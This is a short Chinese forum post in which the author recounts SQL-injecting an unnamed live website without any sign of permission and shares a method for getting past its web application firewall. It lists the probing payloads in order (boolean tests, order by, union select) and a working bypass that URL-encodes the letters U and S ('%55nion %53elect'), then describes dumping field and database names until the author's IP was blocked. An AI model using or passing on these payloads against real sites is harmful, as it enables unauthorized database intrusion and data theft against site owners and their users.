某网站的sql注入绕过的小手法
mucn又来分享了 这网站早就记在我的小本子里了[滑稽]刚刚测试了一下 发现存在注入。 但存在拦截。
然后我在这儿给大家分享一个小绕过方法。
因为刚刚电脑因为多次访问ip被拦截了(如图一) 然后手机搞非常不方便 所以我这里就只分享下怎么绕过哦。
说下前面的几步小操作
and 1=1 (页面正常不拦截)
and 1=2 (页面不正常不拦截)
order by 2 (字段为2 不拦截)
and 1=2 union select 1,2 (拦截)
and 1=2 union (拦截)-这里就判断出waf对union是存在过滤的
and 1=2 select(拦截)-同上 waf对select也存在拦截
然后思考绕过 首先改大小写
and 1=2 UnioN sEleCT (拦截)
接着思考其他绕过手法(对字母U和S进行编码)
and 1=2 %55nion %53elect 1,2 (不拦截 页面爆出字段)如图二
接着通过爆出字段进行一些信息查询 如图三
然后爆库 如图4(就两个库 一个内置库 一个当前使用库)这里要是爆表的话肯定是选择当前使用库进行查表(可惜还没爆表就ip就被拦了 后续等我ip不被拦的时候再考虑要不要继续更下去吧[滑稽][心碎] )
http://cdn.u1.huluxia.com/g3/M01/C2/BF/wKgBOV5xuE6AUF2aAADud7zqV9U803.jpghttp://cdn.u1.huluxia.com/g3/M01/C2/BF/wKgBOV5xuE6AYgbsAAIaO77jsoQ714.pnghttp://cdn.u1.huluxia.com/g3/M01/C2/BF/wKgBOV5xuE-AT640AAKbQZuo2Q0467.jpghttp://cdn.u1.huluxia.com/g3/M01/C2/BF/wKgBOV5xuFCAf-u1AAJLi-n1N6g055.png
页:
[1]